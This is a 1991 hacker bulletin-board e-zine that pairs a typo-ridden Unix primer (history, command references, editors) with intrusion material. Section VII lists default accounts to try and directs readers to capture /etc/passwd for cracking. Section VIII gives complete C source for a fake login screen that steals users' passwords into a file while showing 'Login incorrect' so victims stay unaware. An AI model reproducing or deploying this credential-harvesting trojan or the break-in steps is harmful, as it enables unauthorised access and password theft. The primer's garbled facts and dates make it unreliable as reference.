983 lines
29 KiB
Plaintext
983 lines
29 KiB
Plaintext
![]() |
|
|||
|
|
|||
|
___ ___ ___ ___ ___________
|
|||
|
| \ | |\ | |\ | |\ | |\
|
|||
|
| \ | | | | | | | | | | ___ | |
|
|||
|
| \ | | | | |_|_| | | | |\ _| | |
|
|||
|
| \| | | | | | | |_|_| | |
|
|||
|
| |\ | | | ___ | | | ___ | |
|
|||
|
| | \ | | | |\ _| | | | |\ _| | |
|
|||
|
| | |\ | | | | | | | | | | | | | |
|
|||
|
| | | | | | | | | | | | | | | | | |
|
|||
|
|___| | |___| | |___| | |___| | |___| | |___| |
|
|||
|
\___\| \___\| \___\| \___\| \___\| \___\|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- A Production of the NetWork Hacker Alliance INC -
|
|||
|
|
|||
|
|
|||
|
PreZidents:Inphiniti & Code of Honor & Cobra
|
|||
|
|
|||
|
NHA Member Boards Listing
|
|||
|
+=+=+=+=+=+=+=+=+=+=+=+=+
|
|||
|
+---------------------+---------------+-------------+---------+
|
|||
|
| Inphiniti's Edge | 216-662-5115 | NHA *WHQ* | NoT |
|
|||
|
| Project Phusion | 301-365-9249 | NHA Node 1 | NoT |
|
|||
|
| Realm of Chaos | 516-466-8259 | NHA Node 2 | Ex-NASTY|
|
|||
|
+---------------------+---------------+-------------+---------+
|
|||
|
|
|||
|
|
|||
|
NHA is now accepting applications.. If you are intrested
|
|||
|
and knowledgable in the Hacking of Networks and Phreaking
|
|||
|
etc, please call your fine H/p bbs system and download
|
|||
|
'NHA-APP.TXT' and upload it to Inphiniti's Edge.
|
|||
|
|
|||
|
+--------------------------+
|
|||
|
| -- NHA -- |
|
|||
|
| NetWork Hackers Alliance |
|
|||
|
+--------------------------+
|
|||
|
|
|||
|
Presents
|
|||
|
|
|||
|
Issue 2 : "Unix Information and Hacking"
|
|||
|
|
|||
|
Compiled by Inphiniti & Cobra
|
|||
|
Edited by Inphiniti & Cobra
|
|||
|
---
|
|||
|
AXiS & NHA have merged as of 06/30/91 for the better of H/P in America.
|
|||
|
---
|
|||
|
|
|||
|
---
|
|||
|
Index
|
|||
|
|
|||
|
I. Introduction
|
|||
|
II. History of UNIX
|
|||
|
III. Unix Portability (other names for Unix)
|
|||
|
IV. Frequently Used Commands (explained in detail)
|
|||
|
V. Unix Editors (explained in detial)
|
|||
|
VI Standard Unix Utilities
|
|||
|
VII. UNIX Default Accounts
|
|||
|
VIII. UNIX Password Attacker
|
|||
|
IX. Closing Remarks
|
|||
|
---
|
|||
|
|
|||
|
+-----------------+
|
|||
|
| I. Introduction |
|
|||
|
+-----------------+
|
|||
|
|
|||
|
What is an Operating System?
|
|||
|
|
|||
|
UNIX is a modern day operating system. But, what is an operating system?
|
|||
|
One definition of an operating system is:
|
|||
|
|
|||
|
"the programs of a digital computer system which, together with the
|
|||
|
characteristics of the computer system, form the basis of the various
|
|||
|
operational modes of the digital computer system and especially those
|
|||
|
which control and supervise the processing of programs."
|
|||
|
|
|||
|
This compact and comprehensive description assumes the understanding of
|
|||
|
some concepts. The "digital computer system" is the hardware. These are the
|
|||
|
physical components of the computer which can be touched. Thirty years ago
|
|||
|
this description would have been sufficient. Today addicitonal concepts are
|
|||
|
required. Besides the "body", a computer system must have a "soul". Since
|
|||
|
a "soul" must be immaterial, it can only consist of software in a computer.
|
|||
|
This software is the operating system.
|
|||
|
|
|||
|
Therefore, the characteristics, better yet the hardware characteristics of
|
|||
|
the computer system, together with the operating system form the basis of the
|
|||
|
processing capabilities. The operating system does not include all the
|
|||
|
software in a computer. This is the software which permites the user of the
|
|||
|
system to execute the applications software specifically written to be used
|
|||
|
with that operating system. The user of a modern computer system is no
|
|||
|
longer confronted by the hardware, but with the operating system such as UNIX.
|
|||
|
|
|||
|
From this viewpoint of the user, there are three basic operating modes
|
|||
|
|
|||
|
o Batch Processing
|
|||
|
o Conversational (or interactive) mode
|
|||
|
o Real-time processing
|
|||
|
|
|||
|
Batch processing originated during the time when executable programs were
|
|||
|
read on a card reader in the form of a punched card dec, consisting of
|
|||
|
control statements and the actual program.. The punched cards have now
|
|||
|
disappeared - at best they can still be found as scraps for notes - but the
|
|||
|
concept and the operating mode remains.
|
|||
|
|
|||
|
Batch jobs
|
|||
|
|
|||
|
A barch job must be defined completely and in the proper sequence. The ]
|
|||
|
control statements are usually stored in a file. One of these statements calls
|
|||
|
the program to be executed Several programs can be initiiated within a batch
|
|||
|
job. However, all required operating devices such as disck storage, magnetic
|
|||
|
tape storage, printer, plotter, etc. must be requested from inside the job.
|
|||
|
No calls to the operating system are permitted since they are not answered.
|
|||
|
|
|||
|
Unix and MS-DOS,CP/M or OS/2
|
|||
|
|
|||
|
UNIX is the oldest of the three systems, even though it has been discussed
|
|||
|
only in the last few yeards. CP/M and MS-DOS are oriented strongly toweds
|
|||
|
the main features if UNIX. The newer versions of MS-DOS resemble UNIX
|
|||
|
very much. Even the command syntax is very similar The largest step in
|
|||
|
the direction of UNIX came with DOS Version 2.0.
|
|||
|
|
|||
|
Viewed from the users perspectivem the file systems of UNIX and DOS resemble
|
|||
|
earch other alot. Both orginate in a root are structured hierarchically
|
|||
|
(like a tree). Directories permit the user to retain an overview. Besides
|
|||
|
the common files and directories, UNIX also knows an additional type, the
|
|||
|
device file. Devide files provide an interface to the physical devices
|
|||
|
which are addressed just like an ordinart file. Special systems call for
|
|||
|
control of the peripherals and are therefore not required.
|
|||
|
|
|||
|
Internally a UNIX file differs from a CO/M or DOS file. The orientation
|
|||
|
towards the record oand bloack structure of a disk has been dropped. UNIX
|
|||
|
recoqnizes only blocks which contain byte chains. The type of file does
|
|||
|
not make any difference to UNIX, since it is only a concern of the
|
|||
|
application program using the file.
|
|||
|
|
|||
|
+---------------------+
|
|||
|
| II. History of Unix |
|
|||
|
+---------------------+
|
|||
|
|
|||
|
The history of UNIX begain in 1969 at Bell Labortatories, which is part
|
|||
|
of AT&T. Kennth Thompson developed an operating system writtern in
|
|||
|
DEC PDP-7 assembler code for the "Soace Travel" project. He called it
|
|||
|
UNIX. The names was derived from the preceding operating system
|
|||
|
Multics which was less conservative in the use of scare computer
|
|||
|
resources. UNIX was at first a single user variant of Multics.
|
|||
|
|
|||
|
In 1971 UNIS was implemented again in assembler code on ther more powerful
|
|||
|
computers of the PDP-11 series. To become more independant from another
|
|||
|
change in hardware, Thompson planned a new implementation in a higher level
|
|||
|
language. He developed the B language from BCPL in 1970, but this language
|
|||
|
did not prove powerful enough.
|
|||
|
|
|||
|
After Dennis Ritchie, also a Bell, created the C language, UNIX was
|
|||
|
rewritten almost completely in this higher level language by 1073. By
|
|||
|
utilizing the advantages of C, UNIX became capable of handling multiusers
|
|||
|
and multi-tasking. UNIX was then machine independent and the start signal
|
|||
|
for its rapid distribution was given. At that time, Version 5 was still
|
|||
|
being distributed to American universites free of chare for use in research
|
|||
|
and education. Berkeley University in particular developed UNIX further.
|
|||
|
|
|||
|
The real triumph begain in 1975 with Version 6. AT&T granted source
|
|||
|
licenses to intrested companies, but without support. From this
|
|||
|
release, derivatives of UNIX were created with spilt away from the main
|
|||
|
development.
|
|||
|
|
|||
|
Version 7 of UNIX appeard about the same time as the first 16-bit
|
|||
|
microprocessors. This is the version onwhich most of todays Unix
|
|||
|
derivatives are based. A third branch also developed, which is
|
|||
|
characterizedmost by the Microsoft product XENIX.
|
|||
|
|
|||
|
Since 1983 AT&T has tried to bring the various development streams
|
|||
|
together again. Training, documentation and other support is
|
|||
|
being offered. The external sign is a new number series know as System
|
|||
|
V.
|
|||
|
|
|||
|
+------------------------+
|
|||
|
| III. Unix Portability |
|
|||
|
+------------------------+
|
|||
|
|
|||
|
System Name Manufacturer
|
|||
|
----------- ------------
|
|||
|
Aix IBM
|
|||
|
bsd University of California at Berkeley
|
|||
|
Coherent Mark Williams Co.
|
|||
|
Cromix Cromemco
|
|||
|
Edition VII Perkin-Elmer
|
|||
|
EUNIX Electronic Info Systems, INC
|
|||
|
IDRIS Whitesmith Ltd.
|
|||
|
IS/1 Interactive Systems, INC
|
|||
|
IS/5 Interactive Systems, INC
|
|||
|
JOS CRDS
|
|||
|
MUNIX PCS
|
|||
|
OS-1 Software Labs
|
|||
|
SINIX Siemens
|
|||
|
Unica Knowlogy
|
|||
|
UTS Amdahl
|
|||
|
UNIX Nixdorf
|
|||
|
UX Hwelett Packard
|
|||
|
VENIX Ventur Com Ulnc.
|
|||
|
XENIX Microsoft Co.
|
|||
|
ZEUS Zilog
|
|||
|
|
|||
|
+-------------------------------+
|
|||
|
| IV. Frequently Used Commands |
|
|||
|
+-------------------------------+
|
|||
|
|
|||
|
|
|||
|
Name: CAL
|
|||
|
Syntax: cal [MM] yyyy
|
|||
|
Function: Creates calendar excerpts.
|
|||
|
Options: None
|
|||
|
|
|||
|
Name: CANCEL
|
|||
|
Syntax: cancel [reqiest-id ...] [printer ...]
|
|||
|
Function: Print reuest made with ld or 1pr are canceled
|
|||
|
Options: None
|
|||
|
|
|||
|
Name: CAT
|
|||
|
Syntax: cat [filename]
|
|||
|
Function: Writes the files indicated screen
|
|||
|
Options: none
|
|||
|
|
|||
|
Name: CLEAR
|
|||
|
Syntax: clear
|
|||
|
Function: Clears the display screen.
|
|||
|
Options: none
|
|||
|
|
|||
|
Name: COMM
|
|||
|
Syntax: comm [optoms] dat1 dat2
|
|||
|
Function: Displays the lines common to files dat1 and dat2
|
|||
|
Options: -1 \
|
|||
|
-2 > Suppress output of the corresponding columns/lines
|
|||
|
-3 /
|
|||
|
|
|||
|
Name: CRYPT
|
|||
|
Syntax: crypt [key]
|
|||
|
Functions: Encodes and decodes text.
|
|||
|
Options: None
|
|||
|
|
|||
|
Name: DATE
|
|||
|
Systax: date [date, time]
|
|||
|
Functions: Outputs date and time
|
|||
|
Options: None
|
|||
|
|
|||
|
Name: DU
|
|||
|
Syntax: du [option] [dat1] ...
|
|||
|
Functions: Returns the disk usage or block assignment o the files.
|
|||
|
Options: -a Block number for eache file (defult)
|
|||
|
-s Only the total number of blocks is indicated
|
|||
|
|
|||
|
Name: ECHO
|
|||
|
Syntax: echo [arguments] [\character]
|
|||
|
Function: Output of commentary in shell procedures.
|
|||
|
Options: System dependant.
|
|||
|
|
|||
|
Name: FILE
|
|||
|
Syntax: file [options] file1 ...
|
|||
|
Function: Attempts to determine the specified files class.
|
|||
|
Options: Machine dependant.
|
|||
|
|
|||
|
Name: GREP
|
|||
|
Syntax: grep [options] expressions [file1] ...
|
|||
|
Function: Searched the specified files for text patterns which
|
|||
|
where indicated.
|
|||
|
Options: -b Include Bloack numbers
|
|||
|
-c Count number of matching lines
|
|||
|
-f file Searches ex[ression is in the indicated file and not
|
|||
|
in the arguement.
|
|||
|
-h No filename in the output line
|
|||
|
-n Output line number in every hit line
|
|||
|
-s No output, only status for procedures
|
|||
|
0 = hit
|
|||
|
1 = not hit
|
|||
|
2 = syntax error
|
|||
|
-v Inversion of the command
|
|||
|
-y No distinction made between upper and lower case letters
|
|||
|
|
|||
|
Name: HEAD
|
|||
|
Syntax: head [option] [file1] ...
|
|||
|
Function: The first N lines of stdin, or the files indicated
|
|||
|
Options: -n Indicates the numbner of lines from the beginning of the
|
|||
|
file.
|
|||
|
|
|||
|
Name: LOGIN
|
|||
|
Syntax: login NAME
|
|||
|
Function: Logs new users on the system and removes old users.
|
|||
|
Options: None
|
|||
|
|
|||
|
Name: LP
|
|||
|
Syntax: lp [options] [file1] ...
|
|||
|
Function: Insterts a print request ino the wait quee of the spool
|
|||
|
system.
|
|||
|
Options: -c Creates a temporary Copy file
|
|||
|
-m After print output, a message is sent by mail
|
|||
|
to the orginator
|
|||
|
-r remove file after insertion of a temporary copy into
|
|||
|
waiting queue
|
|||
|
|
|||
|
Name: LPSTAT
|
|||
|
Syntax: lpstat [options] [request...]
|
|||
|
Function: Provides information for the spool system, including
|
|||
|
the current status of th print queue
|
|||
|
Options: -u [list] oputputs the status of all print requests for
|
|||
|
users in the list specified, each sperarated by
|
|||
|
a comma.
|
|||
|
|
|||
|
Name: MORE & PG
|
|||
|
Syntax: more [options] [file1] ...
|
|||
|
pg [options] [file1] ...
|
|||
|
Function: Display ready preparation of output with user controls
|
|||
|
for ease of viewing.
|
|||
|
Options: -l returs a disply ready list
|
|||
|
|
|||
|
Name: PASSWD
|
|||
|
Syntax: passwd [user-name]
|
|||
|
Function: Change or define a new password
|
|||
|
Options: None
|
|||
|
|
|||
|
Name: PR
|
|||
|
Syntax: pr [options] [file1] ...
|
|||
|
Function: Prepates files for printing.
|
|||
|
Options: -h following textis output as header.
|
|||
|
-l[n] Lines per page
|
|||
|
-n n column output
|
|||
|
-n[nz] Line numbering
|
|||
|
n = Number Size
|
|||
|
z Dividing charaters between line numbers and content
|
|||
|
-o[n] n charaters spaces at the left border
|
|||
|
-p[n] After n pages, wait so that baper can be changed
|
|||
|
-t Suppresses title, line numbers and date.
|
|||
|
-w[n] Page width in charaters.
|
|||
|
|
|||
|
Name: PS
|
|||
|
Syntax: ps [options] [process1 ...] [user1 ...]
|
|||
|
Function: Gives status information about active processes.
|
|||
|
Options: -a All interactive processes.
|
|||
|
-e All process for all users.
|
|||
|
-f Complete information list
|
|||
|
-l long form of the information list.
|
|||
|
-u user all process for the indicated users.
|
|||
|
|
|||
|
Name: SORT
|
|||
|
syntax: sort [options] [+pos1] [-pos2] [file1] ...
|
|||
|
Function. Sorts the lines of all files indicated according to
|
|||
|
the ascii character set.
|
|||
|
Options: -b Ignore blanks and tab characters at the begining
|
|||
|
of the file.
|
|||
|
-d Consider only alphanumeric characters and blanks.
|
|||
|
-f Treat uppercase letters as lowercase
|
|||
|
-r Sort in revers order.
|
|||
|
-t [c] Dividing character c, may not be a space
|
|||
|
|
|||
|
Name: SPLIT
|
|||
|
Syntax: split [-n] [file [name]]
|
|||
|
Function: Splits the indicated file into parts of n lines each.
|
|||
|
Option: -n Number of lines for each partial file.
|
|||
|
|
|||
|
Name: TAIL
|
|||
|
Syntax: tail [n [units]] [file1 ...]
|
|||
|
Functions: Copies the named file to stdout, beginning at the
|
|||
|
designated postion within the file.
|
|||
|
Options: None
|
|||
|
|
|||
|
Name: TIME
|
|||
|
Syntax: time [command]
|
|||
|
Function: Returns the execution time of a command or program with
|
|||
|
actual delays in seconds.
|
|||
|
Options: None
|
|||
|
|
|||
|
Name: WC
|
|||
|
Syntax: wc [options] [file1] ...
|
|||
|
Function: Counts lines, words and/or charaters in the indicated file
|
|||
|
Options: -l counts only lines
|
|||
|
-w counts only words
|
|||
|
-c counts only characters
|
|||
|
|
|||
|
Name: WHO
|
|||
|
syntax: who
|
|||
|
Function: Returns information about current users, user ids, terminals
|
|||
|
and start of session.
|
|||
|
Options: None
|
|||
|
|
|||
|
+-----------------+
|
|||
|
| V. Unix Editors |
|
|||
|
+-----------------+
|
|||
|
|
|||
|
There are three basic editors in the unix environment. Some systems have
|
|||
|
other non-portable editors but there are three basic ones.
|
|||
|
|
|||
|
ed:
|
|||
|
- line oriented
|
|||
|
- interactive
|
|||
|
|
|||
|
sed:
|
|||
|
- line oriented
|
|||
|
- not interactive
|
|||
|
- for batch processing
|
|||
|
|
|||
|
vi:
|
|||
|
- most powerful UNIX editor
|
|||
|
- interactive
|
|||
|
- full screen capability
|
|||
|
|
|||
|
-- ED Editor Command Summary --
|
|||
|
|
|||
|
syntax: ed [-] [-x] [file]
|
|||
|
|
|||
|
Commands
|
|||
|
--------
|
|||
|
a append
|
|||
|
i insert
|
|||
|
c change
|
|||
|
w [file] write to [file]
|
|||
|
. current line
|
|||
|
$ last line
|
|||
|
n Specifir line number n
|
|||
|
+n Go ahead N lines
|
|||
|
-n Go back N lines
|
|||
|
d delete
|
|||
|
e file Reads file into current file
|
|||
|
f outputs name of processed files
|
|||
|
j join
|
|||
|
l list
|
|||
|
p print
|
|||
|
r file read and insserrs specified file behind the indicated buffer
|
|||
|
m [line] move to line #
|
|||
|
t [line] transfer to line #
|
|||
|
u undo
|
|||
|
q quit
|
|||
|
! executes the shell command
|
|||
|
|
|||
|
|
|||
|
-- SED Editor Command Summary --
|
|||
|
|
|||
|
Syntax: sed [-n] [-e script] [-f cmd_file] [input_file ...]
|
|||
|
|
|||
|
Options: -e sed command can be indicated directly
|
|||
|
-f sed command are read from specifierd command file
|
|||
|
-n suppresses the standard output
|
|||
|
|
|||
|
|
|||
|
-- VI Editor Command Summary --
|
|||
|
|
|||
|
a append
|
|||
|
i insert
|
|||
|
o open
|
|||
|
esc to exit insert mode
|
|||
|
w write file
|
|||
|
q to quit
|
|||
|
j move down one line
|
|||
|
k move up one line
|
|||
|
|
|||
|
+-----------------------------+
|
|||
|
| VI. Standard Unix Utilities |
|
|||
|
+-----------------------------+
|
|||
|
|
|||
|
(Please Note: When entering this commands in UNIX you type in lower case)
|
|||
|
|
|||
|
ACCEPT Permits spooling request for printer
|
|||
|
|
|||
|
ADB Absolute debugger
|
|||
|
|
|||
|
AR Maintains portable archives and libaries
|
|||
|
|
|||
|
AS Assembler
|
|||
|
|
|||
|
AT Executes commands at a later time
|
|||
|
|
|||
|
AWK Pattern scanning and processing language
|
|||
|
|
|||
|
BANNER Makes text banners
|
|||
|
|
|||
|
BASENAME Outputs filename from path name
|
|||
|
|
|||
|
BATCH Executes commands at a later time
|
|||
|
|
|||
|
BC Desktop calculator with programming constuctions
|
|||
|
|
|||
|
BDIFF Compares two large files
|
|||
|
|
|||
|
BFS Big file scanner
|
|||
|
|
|||
|
CAL Outputs a Calander
|
|||
|
|
|||
|
CALENDAR Appointment scheduler
|
|||
|
|
|||
|
CANCEL Cancels previous spool requests
|
|||
|
|
|||
|
CAT COncatenates and prints files
|
|||
|
|
|||
|
CC C Language compiler
|
|||
|
|
|||
|
CD Changed current work directory
|
|||
|
|
|||
|
CHGRP Changes group ownership of file or directory
|
|||
|
|
|||
|
CHMOD Changes file access permission
|
|||
|
|
|||
|
CHOWN Changes file ownership
|
|||
|
|
|||
|
CMP Compares two files
|
|||
|
|
|||
|
COL Filters revers line feeds
|
|||
|
|
|||
|
COMM Selects or rejects lines common to two sorted files
|
|||
|
|
|||
|
CP Copies files
|
|||
|
|
|||
|
COIP Copies files archives in and out
|
|||
|
|
|||
|
CPP C language preprocessor
|
|||
|
|
|||
|
CRYPT Encodes and Decodes text
|
|||
|
|
|||
|
CSPLIT Splits files based on pattern matching
|
|||
|
|
|||
|
CT Spawns a getty process to a remote terminal
|
|||
|
|
|||
|
CTRACE Traces C program execution
|
|||
|
|
|||
|
CU Calls another UNIX system
|
|||
|
|
|||
|
CUT Cuts out selected fields of each line of a file
|
|||
|
|
|||
|
CREF Generates C program cross-reference listing
|
|||
|
|
|||
|
DATE Sets or prints the current date
|
|||
|
|
|||
|
DC Desktop calculator
|
|||
|
|
|||
|
DD Performs file trasnformations
|
|||
|
|
|||
|
DEROFF Removes formatting commands from file
|
|||
|
|
|||
|
DF Displays free space in file system
|
|||
|
|
|||
|
DIFF Compares two files
|
|||
|
|
|||
|
DIFF3 Compares three files
|
|||
|
|
|||
|
DIRCMP Compares directories
|
|||
|
|
|||
|
DIRNAME Outputs the path from a path name
|
|||
|
|
|||
|
DIS Object file disassembler
|
|||
|
|
|||
|
DISABLE Disables spooling on printer
|
|||
|
|
|||
|
DU Summarizes Disk usage
|
|||
|
|
|||
|
ECHO Echoes arguments
|
|||
|
|
|||
|
ED Line-oriented editor
|
|||
|
|
|||
|
EDIT Line-oriented editor
|
|||
|
|
|||
|
ENABLE Enables spooling on a printer
|
|||
|
|
|||
|
ENV Sets environment for command execution
|
|||
|
|
|||
|
EXPR Evaluates arguments as an expression
|
|||
|
|
|||
|
FACTOR Obtains prime factors of a number
|
|||
|
|
|||
|
FGREP Searchs a file for a character string
|
|||
|
|
|||
|
FILE Determines file type
|
|||
|
|
|||
|
FIND Searches for files
|
|||
|
|
|||
|
FSDB Debugs damaged file systems
|
|||
|
|
|||
|
GED Graphical Editor
|
|||
|
|
|||
|
GETOPTS Phrase command line options
|
|||
|
|
|||
|
GLOSSARY Displays definitions of UNIX system terms and symbols
|
|||
|
|
|||
|
GRAPH Draws a graph
|
|||
|
|
|||
|
GRAPHICS Accesses graphical and numerical commands
|
|||
|
|
|||
|
GREEK Selects terminal filter
|
|||
|
|
|||
|
GREP Selects lines of a file based on a pattern matching
|
|||
|
|
|||
|
GUTIL Graphical utilties
|
|||
|
|
|||
|
HELP Provides on-line help on UNIX commands
|
|||
|
|
|||
|
HELPADM Makes changes to the Help Facility Database
|
|||
|
|
|||
|
ID Outputs user and group ID's and names
|
|||
|
|
|||
|
IPCS Reports interprocess communication ffacilities status
|
|||
|
|
|||
|
JOIN Joins two tabular data files
|
|||
|
|
|||
|
KILL Terminates or signals a process
|
|||
|
|
|||
|
LINE Copies a line from standard input to output
|
|||
|
|
|||
|
LN Links file names
|
|||
|
|
|||
|
LOGIN Admits autorized users to system
|
|||
|
|
|||
|
LOGNAME Outputs the user's login name
|
|||
|
|
|||
|
LP Line printer spooler
|
|||
|
|
|||
|
LPR Line printer spooler
|
|||
|
|
|||
|
LPADMIN Configes the 1p spooling system
|
|||
|
|
|||
|
LPSTAT Printer spooling status information
|
|||
|
|
|||
|
LS Lists contents of directories
|
|||
|
|
|||
|
M4 Macro processor
|
|||
|
|
|||
|
MAIL Sends and recieves UNIX mail
|
|||
|
|
|||
|
MAILX Extended Mail Facility
|
|||
|
|
|||
|
MAKE Regenerates groups of programs
|
|||
|
|
|||
|
MAKEKEY Regenerates encryption key
|
|||
|
|
|||
|
MAN Prints on-line manual entries
|
|||
|
|
|||
|
MESG Permits or denies messages
|
|||
|
|
|||
|
MKDIR Makes a Directory
|
|||
|
|
|||
|
MKFS Creates a file system on disk
|
|||
|
|
|||
|
MKNOD Creates a directory entry for a special file
|
|||
|
|
|||
|
MOUNT Mounts a file system
|
|||
|
|
|||
|
MV Moves files
|
|||
|
|
|||
|
MVDIR Moves a directory
|
|||
|
|
|||
|
NEWFORM Reformats lines of a text file
|
|||
|
|
|||
|
NEWGRP Changes active group membership
|
|||
|
|
|||
|
NEWS Prints News commands
|
|||
|
|
|||
|
NICE Runs a program at reduced priority
|
|||
|
|
|||
|
NL Line numbering filter
|
|||
|
|
|||
|
NOHUP Runs a command immune from hang-ups and quits
|
|||
|
|
|||
|
NROFF Text formatter
|
|||
|
|
|||
|
OD Outputs an octal dump of a file
|
|||
|
|
|||
|
PACK Packs files
|
|||
|
|
|||
|
PASSWD Changes online users password
|
|||
|
|
|||
|
PASTE Merge lines of files
|
|||
|
|
|||
|
PCAT Concatenates packed files
|
|||
|
|
|||
|
PG Browse file contents on terminal screen
|
|||
|
|
|||
|
PR Print files
|
|||
|
|
|||
|
PS Outputs process status
|
|||
|
|
|||
|
PWD Prints the name of the current working directory
|
|||
|
|
|||
|
RM Removes files
|
|||
|
|
|||
|
RMDIR Removes directories
|
|||
|
|
|||
|
RSH Restricted UNIX system shell
|
|||
|
|
|||
|
SAG Outputs system activity graph
|
|||
|
|
|||
|
SAR Outputs system activity report
|
|||
|
|
|||
|
SCAT Concatenates and prints files
|
|||
|
|
|||
|
SDB Symbolic debugger
|
|||
|
|
|||
|
SDIFF Compares two files
|
|||
|
|
|||
|
SED Stream Editor
|
|||
|
|
|||
|
SH The Unix system shell
|
|||
|
|
|||
|
SHL Shell layer manager
|
|||
|
|
|||
|
SHUTDOWN Shuts down the system
|
|||
|
|
|||
|
SLEEP Suppends execution for a time interval
|
|||
|
|
|||
|
SORT Sorts and merges files
|
|||
|
|
|||
|
SPLIT Splits a file
|
|||
|
|
|||
|
STARTER Displays UNIX information for new users
|
|||
|
|
|||
|
STRIP Removres symbol table information from object file
|
|||
|
|
|||
|
STTY Sets ternubak characterustics
|
|||
|
|
|||
|
SU Tempararily changes the user-ID
|
|||
|
|
|||
|
SUM Outputs checksum and block count for file
|
|||
|
|
|||
|
SYNC Writes disk buffers to disk
|
|||
|
|
|||
|
SYSADM Menu Driven system administration utility
|
|||
|
|
|||
|
TABS Srets tabs on a terminal
|
|||
|
|
|||
|
TAIL Outputs the last oart of a file
|
|||
|
|
|||
|
TAR Tape file archiver
|
|||
|
|
|||
|
TEE Pipe fitter
|
|||
|
|
|||
|
TEST Evaluates conditions
|
|||
|
|
|||
|
TIME Times command execution
|
|||
|
|
|||
|
TOUCH Updates access and modifications times of a file
|
|||
|
|
|||
|
TR Character translation fiflter
|
|||
|
|
|||
|
TROFF Phototypesetter text formatter
|
|||
|
|
|||
|
TRUE Returns true value
|
|||
|
|
|||
|
TTY Outputs name of a terminal
|
|||
|
|
|||
|
UNMASK Setsr file creation mode mask
|
|||
|
|
|||
|
UMOUNT Dismounts a file system
|
|||
|
|
|||
|
UNAME Outputs the name of the current UNIX system
|
|||
|
|
|||
|
UNIQ Outputs a file with unique lines
|
|||
|
|
|||
|
UNITS Performs units conversions
|
|||
|
|
|||
|
UNPACK Unpacks packed files
|
|||
|
|
|||
|
USAGE Displays information about command usage
|
|||
|
|
|||
|
UUCP Copies files between UNIX systems
|
|||
|
|
|||
|
UULOG Outputs UUCP log information
|
|||
|
|
|||
|
UUNAME Outputs UUCP names of known systems
|
|||
|
|
|||
|
UUSTAT Outputs UUCP status information
|
|||
|
|
|||
|
UUX Executes a command on a remote UNIX system
|
|||
|
|
|||
|
VI Full screen editor
|
|||
|
|
|||
|
WAIT Waites for completeion of background processing
|
|||
|
|
|||
|
WALL Sends a message to all users
|
|||
|
|
|||
|
WC Outputs line, word and character counts for files
|
|||
|
|
|||
|
WHO Outpurts information on current users
|
|||
|
|
|||
|
WRITE Sends messages to another user
|
|||
|
|
|||
|
XARGS Constructs an argument list and executes a command
|
|||
|
|
|||
|
YACC Compiler-generating tool
|
|||
|
|
|||
|
|
|||
|
+----------------------------+
|
|||
|
| VII. Unix Defualt Accounts |
|
|||
|
+----------------------------+
|
|||
|
|
|||
|
Super User Default Accounts
|
|||
|
|
|||
|
ROOT
|
|||
|
MAKESYST
|
|||
|
MOUNTSYS
|
|||
|
UMUNTFSYS
|
|||
|
CHECKSYS
|
|||
|
FSYS
|
|||
|
|
|||
|
Regular User Defaults
|
|||
|
|
|||
|
DAEMON
|
|||
|
DAEMONx (x value is 1 thru 9)
|
|||
|
LP
|
|||
|
|
|||
|
Unix Systems that have already been hacked try..
|
|||
|
|
|||
|
ROCUSER
|
|||
|
IEx (x value is 1 thru 4)
|
|||
|
ANONYMOUS
|
|||
|
GUEST
|
|||
|
|
|||
|
|
|||
|
If it askes for a password I doubt you will get in but always try the
|
|||
|
account name.
|
|||
|
|
|||
|
Once in type this (at the waiting prompt usually a # or $)
|
|||
|
|
|||
|
cd /ETC (UNIX root directory)
|
|||
|
cat PASSWD (UNIX password file) <--- Capture this if you can get it
|
|||
|
then find a UNIX hacker on your local H/P board and let it run!
|
|||
|
|
|||
|
+------------------------------+
|
|||
|
| VIII. Unix Password Attacker |
|
|||
|
+------------------------------+
|
|||
|
|
|||
|
|
|||
|
/* this is what a 'C' comment looks like. You can leave them out. */
|
|||
|
|
|||
|
/* #define's are like macros you can use for configuration. */
|
|||
|
|
|||
|
#define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
|
|||
|
|
|||
|
/* The above string should be made to look like the message that your
|
|||
|
* system prints when ready. Each \n represents a carriage return.
|
|||
|
*/
|
|||
|
|
|||
|
#define LOGIN "login: "
|
|||
|
|
|||
|
/* The above is the login prompt. You shouldn't have to change it
|
|||
|
* unless you're running some strange version of UNIX.
|
|||
|
*/
|
|||
|
|
|||
|
#define PASSWORD "password:"
|
|||
|
|
|||
|
/* The above is the password prompt. You shouldn't have to change
|
|||
|
* it, either.
|
|||
|
*/
|
|||
|
|
|||
|
#define WAIT 2
|
|||
|
|
|||
|
/* The numerical value assigned to WAIT is the delay you get after
|
|||
|
* "password:" and before "login incorrect." Change it (0 = almost
|
|||
|
* no delay, 5 = LONG delay) so it looks like your system's delay.
|
|||
|
* realism is the key here - we don't want our target to become
|
|||
|
* suspicious.
|
|||
|
*/
|
|||
|
|
|||
|
|
|||
|
#define INCORRECT "Login incorrect.\n"
|
|||
|
|
|||
|
/* Change the above so it is what your system says when an incorrect
|
|||
|
* login is given. You shouldn't have to change it.
|
|||
|
*/
|
|||
|
|
|||
|
#define FILENAME "stuff"
|
|||
|
|
|||
|
/* FILENAME is the name of the file that the hacked passwords will
|
|||
|
* be put into automatically. 'stuff' is a perfectly good name.
|
|||
|
*/
|
|||
|
|
|||
|
/* Don't change the rest of the program unless there is a need to
|
|||
|
* and you know 'C'.
|
|||
|
*/
|
|||
|
|
|||
|
#include <curses.h>
|
|||
|
#include <signal.h>
|
|||
|
int stop();
|
|||
|
|
|||
|
main()
|
|||
|
{
|
|||
|
char name[10], password[10];
|
|||
|
int i;
|
|||
|
FILE *fp, *fopen();
|
|||
|
signal(SIGINT,stop);
|
|||
|
initscr();
|
|||
|
printf(SYSTEM);
|
|||
|
printf(LOGIN);
|
|||
|
scanf("%[^\n]",name);
|
|||
|
getchar();
|
|||
|
noecho();
|
|||
|
printf(PASSWORD);
|
|||
|
scanf("%[^\n]",password);
|
|||
|
printf("\n");
|
|||
|
getchar();
|
|||
|
echo();
|
|||
|
sleep(WAIT);
|
|||
|
|
|||
|
|
|||
|
if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
|
|||
|
#fprintf(fp,"login %s has password %s\n",name,password);
|
|||
|
#fclose(fp);
|
|||
|
#}
|
|||
|
|
|||
|
printf(INCORRECT);
|
|||
|
endwin();
|
|||
|
}
|
|||
|
|
|||
|
stop()
|
|||
|
{
|
|||
|
endwin();
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
|
|||
|
-- END --
|
|||
|
|
|||
|
** this is how you compile it
|
|||
|
|
|||
|
